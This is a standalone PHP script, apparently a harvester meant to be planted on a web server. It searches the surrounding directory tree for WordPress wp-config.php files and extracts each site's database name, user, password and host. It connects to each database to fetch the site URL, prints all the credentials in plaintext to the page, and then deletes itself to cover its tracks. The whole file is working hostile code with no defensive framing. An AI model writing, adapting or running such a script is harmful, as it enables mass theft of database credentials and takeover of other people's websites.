<?php
echo "Scan Time: " . date("Y-m-d H:i:s") . "<br />\n";

$depth = 2;
$base = __DIR__;
for ($i = 0; $i < $depth; $i++) {
    $base = dirname($base);
}


function handle_wp_config($wp_config_path) {
    $config = file_get_contents($wp_config_path);
    $vars = [];

    foreach (['DB_NAME','DB_USER','DB_PASSWORD','DB_HOST'] as $key) {
        $pattern = '/define\s*\(\s*[\'"]' . preg_quote($key, '/') . '[\'"]\s*,\s*[\'"](.+?)[\'"]\s*\)\s*;/';
        if (preg_match($pattern, $config, $m)) {
            $vars[$key] = $m[1];
        } else {
            $vars[$key] = null;
        }
    }

    if (preg_match('/\$table_prefix\s*=\s*[\'"](.+?)[\'"]\s*;/', $config, $m)) {
        $vars['table_prefix'] = $m[1];
    } else {
        $vars['table_prefix'] = null;
    }

    if (in_array(null, $vars, true)) return;

    @$db = new mysqli($vars['DB_HOST'], $vars['DB_USER'], $vars['DB_PASSWORD'], $vars['DB_NAME']);
    if ($db->connect_error) return;

    $res = $db->query("SELECT option_value FROM `{$vars['table_prefix']}options` WHERE option_name='siteurl'");
    if ($res && $row = $res->fetch_row()) {
        echo "<b>" . htmlspecialchars($row[0]) . "</b><br />\n";
        echo "Path: " . htmlspecialchars($wp_config_path) . "<br />\n";
        echo "DB_USER: " . htmlspecialchars($vars['DB_USER']) . "<br />\n";
        echo "DB_PASSWORD: " . htmlspecialchars($vars['DB_PASSWORD']) . "<br />\n";
        echo "DB_NAME: " . htmlspecialchars($vars['DB_NAME']) . "<br />\n";
        echo "DB_HOST: " . htmlspecialchars($vars['DB_HOST']) . "<br />\n";
        echo "-----------------------------------------------------<br />\n";
    }
}


$direct_config = $base . DIRECTORY_SEPARATOR . 'wp-config.php';
if (file_exists($direct_config)) {
    handle_wp_config($direct_config);
}

foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($base)) as $f) {
    if (basename($f) !== 'wp-config.php') continue;
    handle_wp_config((string)$f);
}

unlink(__FILE__);
?>